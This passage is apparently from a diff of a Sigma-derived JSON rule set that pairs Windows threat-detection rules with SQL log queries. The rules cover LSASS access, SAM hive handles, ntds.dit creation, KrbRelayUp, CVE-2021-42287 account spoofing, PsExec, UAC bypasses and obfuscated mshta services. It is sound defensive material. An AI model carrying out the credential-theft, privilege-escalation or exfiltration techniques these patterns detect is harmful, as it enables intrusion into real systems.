"SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 
'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" - ], 
+ "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "status": "test", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' 
ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "status": "test", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', 
'1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' 
ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.003" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 
'%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "DiagTrackEoP 
Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "status": "experimental", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "status": "experimental", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.defense_evasion", + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1078" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs 
WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE 
'%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - 